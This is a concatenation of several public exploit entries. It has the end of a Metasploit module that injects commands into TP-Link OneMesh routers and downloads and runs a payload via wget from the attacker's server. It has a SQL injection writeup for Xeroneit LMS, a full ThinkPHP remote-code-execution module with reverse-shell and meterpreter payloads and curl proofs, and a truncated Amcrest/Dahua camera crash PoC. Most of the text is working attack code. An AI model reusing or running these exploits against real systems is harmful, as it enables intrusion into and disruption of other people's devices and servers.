return Exploit::CheckCode::Unknown
end
def calc_checksum(packet)
# reference table used to calculate the packet checksum
# used by tdpd_pkt_calc_checksum (0x4037f0)
# located at offset 0x0416e90 in the binary
reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee,
0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4,
0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79,
0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c,
0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d,
0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41,
0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83,
0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9,
0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa,
0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10,
0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b,
0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8,
0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32,
0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d,
0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf,
0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95,
0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6,
0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c,
0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01,
0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85,
0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78,
0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98,
0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6,
0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30,
0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82,
0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9,
0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15,
0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61,
0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a,
0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4,
0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda,
0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c,
0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe,
0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85,
0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29,
0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d,
0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed,
0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2,
0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73,
0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a,
0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a,
0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3,
0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80,
0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b,
0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9,
0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e,
0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f,
0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06,
0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36,
0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf,
0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc,
0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77,
0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5,
0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a,
0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b,
0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3,
0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72,
0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a,
0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5,
0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2,
0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81,
0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47,
0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11,
0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff,
0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e,
0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16,
0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9,
0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae,
0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd,
0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3,
0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23,
0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b,
0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a,
0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
res = 0xffffffff
# main checksum calculation
packet.each_entry { |c|
index = ((c ^ res) & 0xff) * 4
# .reverse is needed as the target is big endian
ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
res = ref ^ (res >> 8)
}
checksum = ~res
checksum_s = [(checksum)].pack('I>').force_encoding("ascii")
# convert back to string
packet = packet.pack('C*').force_encoding('ascii')
# and replace the checksum
packet[12] = checksum_s[0]
packet[13] = checksum_s[1]
packet[14] = checksum_s[2]
packet[15] = checksum_s[3]
packet
end
def aes_encrypt(plaintext)
# Function encrypts perfectly 16 bytes aligned payload
if (plaintext.length % 16 != 0)
return
end
cipher = OpenSSL::Cipher.new 'AES-128-CBC'
# in the original C code the key and IV are 256 bits long... but they still use AES-128
iv = "1234567890abcdef"
key = "TPONEMESH_Kf!xn?"
encrypted = ''
cipher.encrypt
cipher.iv = iv
cipher.key = key
# Take each 16 bytes block and encrypt it
plaintext.scan(/.{1,16}/) { |block|
encrypted += cipher.update(block)
}
encrypted
end
def create_injection(c)
# Template for the command injection
# The injection happens at "slave_mac" (read advisory for details)
# The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
# This will fail if we send a command with single quotes (')
# ... but that's not a problem for this module, since we don't use them for our command.
# It might also fail with double quotes (") since this will break the JSON...
inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
template = "{\"method\":\"slave_key_offer\",\"data\":{"\
"\"group_id\":\"#{rand_text_numeric(1..3)}\","\
"\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
"\"slave_mac\":\"%{INJECTION}\","\
"\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
"\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
"\"want_to_join\":false,"\
"\"model\":\"#{rand_text_alpha(5..13)}\","\
"\"product_type\":\"#{rand_text_alpha(5..13)}\","\
"\"operation_mode\":\"A%{PADDING}\"}}"
# This is required to calculate exact template length without replace flags
template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
# This has to be initialized to cover the situation when no padding is needed
pad = ''
padding = rand_text_alpha(16)
template_len += inject.length
# Calculate pad if padding is needed
if (template_len % 16 != 0)
pad = padding[0..15-(template_len % 16)]
end
# Here the final payload is created
template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
end
def update_len_field(packet, payload_length)
new_packet = packet[0..3]
new_packet += [payload_length].pack("S>")
new_packet += packet[6..-1]
end
def exec_cmd_file(packet)
# This function handles special action of exec
# Returns new complete tpdp packet
inject = "\';sh #{@cmd_file}\'"
payload = create_injection(inject)
ciphertext = aes_encrypt(payload)
if not ciphertext
fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
end
new_packet = packet[0..15]
new_packet += ciphertext
new_packet = update_len_field(new_packet, ciphertext.length)
calc_checksum(new_packet.bytes)
end
# Handle incoming requests from the router
def on_request_uri(cli, request)
print_good("#{peer} - Sending executable to the router")
print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
send_response(cli, @payload_exe)
@payload_sent = true
end
def exploit
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
end
if datastore['SSL']
fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
end
print_status("Attempting to exploit #{target.name}")
tpdp_packet_template =
[0x01].pack('C*') + # packet version, fixed to 1
[0xf0].pack('C*') + # set packet type to 0xf0 (onemesh)
[0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table
[0x00].pack('S>*') + # packet len
[0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function
[0x00].pack('C*') + # dunno what this is
[rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value
[0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder
srv_host = datastore['SRVHOST']
srv_port = datastore['SRVPORT']
@cmd_file = rand_text_alpha_lower(1)
# generate our payload executable
@payload_exe = generate_payload_exe
# Command that will download @payload_exe and execute it
download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
http_service = 'http://' + srv_host + ':' + srv_port.to_s
print_status("Starting up our web service on #{http_service} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => "/#{@cmd_file}"
}})
print_status("#{peer} - Connecting to the target")
connect_udp
print_status("#{peer} - Sending command file byte by byte")
print_status("#{peer} - Command: #{download_cmd}")
mod = download_cmd.length / 5
download_cmd.each_char.with_index { |c, index|
# Generate payload
payload = create_injection(c)
if not payload
fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
end
# Encrypt payload
ciphertext = aes_encrypt(payload)
if not ciphertext
fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
end
tpdp_packet = tpdp_packet_template.dup
tpdp_packet += ciphertext
tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
tpdp_packet = calc_checksum(tpdp_packet.bytes)
udp_sock.put(tpdp_packet)
# Sleep to make sure the payload is processed by a target
Rex.sleep(1)
# Print progress
if ((index+1) % mod == 0)
percentage = 20 * ((index+1) / mod)
# very advanced mathemathics in use here to show the progress bar
print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
if percentage == 100
# a bit of cheating to get the last char done right
index = -2
end
#print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
end
}
# Send the exec command. From here we should receive the connection
print_status("#{peer} - Command file sent, attempting to execute...")
tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
udp_sock.put(tpdp_packet)
timeout = 0
while not @payload_sent
Rex.sleep(1)
timeout += 1
if timeout == datastore['MAX_WAIT'].to_i
fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
end
end
disconnect_udp
end
end
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link:
https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo :https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps
1. Description
scritp has SQLI in books category at this dir
/lms/home/book?category_name=00*SQLI
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21
Filename: models/Basic.php
Line Number: 284
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
'Description' => %q{
This module exploits one of two PHP injection vulnerabilities in the
ThinkPHP web framework to execute code as the web user.
Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
vulnerable to a separate vulnerability. The module will automatically
attempt to detect the version of the software.
Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
},
'Author' => [
# Discovery by unknown threaty threat actors
'wvu' # Module
],
'References' => [
# https://www.google.com/search?q=thinkphp+rce, tbh
['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
],
'DisclosureDate' => '2018-12-10', # Unknown discovery date
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
register_advanced_options([
# NOTE: You may want to tweak this for long-running commands like find(1)
OptFloat.new('CmdOutputTimeout',
[true, 'Timeout for cmd/unix/generic output', 3.5])
])
# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
=begin
wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=1353 HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Date: Mon, 13 Apr 2020 06:42:15 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Content-Length: 7332
< Content-Type: text/html; charset=utf-8
<
{ [7332 bytes data]
* Connection #0 to host 127.0.0.1 left intact
5.0.20wvu@kharak:~$
=end
def check
# An unknown route will trigger the ThinkPHP copyright with version
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => rand_text_alpha(8..42)}
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
return CheckCode::Unknown(
'Target did not respond with ThinkPHP copyright.'
)
end
# Get the first copyright <span> containing the version
version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text
unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
return CheckCode::Detected(
'Target did not respond with ThinkPHP version.'
)
end
# Make the parsed version a comparable ivar for automatic exploitation
@version = Gem::Version.new(version)
if @version <= Gem::Version.new('5.0.23')
return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
end
CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
# This is just extra insurance in case I screwed up the check method
unless @version
fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
end
print_status("Targeting ThinkPHP #{@version} automatically")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
# XXX: Only opts[:noconcat] may induce responses from the server
execute_cmdstager
else # This is just extra insurance in case I screwed up the info hash
fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
if @version < Gem::Version.new('5.0.23')
exploit_less_than_5_0_23(cmd)
elsif @version == Gem::Version.new('5.0.23')
exploit_5_0_23(cmd)
else # This is just extra insurance in case I screwed up the exploit method
fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
end
end
=begin
wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:43:45 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
def exploit_less_than_5_0_23(cmd)
# XXX: The server may block on executing our payload and won't respond
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
's' => '/Index/\\think\\app/invokefunction',
'function' => 'call_user_func_array',
'vars[0]' => 'system', # TODO: Debug ARCH_PHP
'vars[1][]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
# HACK: Print half of the doubled-up command output
vprint_line(res.body[0, res.body.length / 2])
end
=begin
wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
> POST /index.php?s=captcha HTTP/1.1
> Host: 127.0.0.1:8081
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
>
} [72 bytes data]
* upload completely sent off: 72 out of 72 bytes
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:44:05 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.12
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
def exploit_5_0_23(cmd)
# XXX: The server may block on executing our payload and won't respond
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => 'captcha'},
'vars_post' => {
'_method' => '__construct',
'filter[]' => 'system', # TODO: Debug ARCH_PHP
'method' => 'get',
'server[REQUEST_METHOD]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
# Clean up output from cmd/unix/generic
vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
end
end
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
import argparse
import hashlib
import socket
import struct
import sys
import md5
import re
## DDNS test functionality. Stack overflow via memcpy
def recv_response(sock):
# minimum size is 32 bytes
header = sock.recv(32)
# check we received enough data
if len(header) != 32:
print 'Invalid response. Too short'
return (False, '', '')
# extract the payload length field
length_field = header[4:8]
payload_length = struct.unpack_from('I', length_field)
payload_length = payload_length[0]
# uhm... lets be restrictive of accepted lengths
if payload_length < 0 or payload_length > 4096:
print 'Invalid response. Bad payload length'
return (False, header, '')
if (payload_length == 0):
return (True, header, '')
payload = sock.recv(payload_length)
if len(payload) != payload_length:
print 'Invalid response. Bad received length'
return (False, header, payload)
return (True, header, payload)
def sofia_hash(msg):
h = ""
m = hashlib.md5()
m.update(msg)
msg_md5 = m.digest()
for i in range(8):
n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
if n > 9:
if n > 35:
n += 61
else:
n += 55
else:
n += 0x30
h += chr(n)
return h
top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
required=True, help="The password to use")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
"\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
"\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)
(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
print 'Failed to receive the challenge'
print challenge
sys.exit(0)
# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
challenge)
if seeds == None:
print 'Failed to extract realm and random seed.'
print challenge
sys.exit(0)
realm = seeds.group(1)
random = seeds.group(2)
# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
args.password).hexdigest().upper()
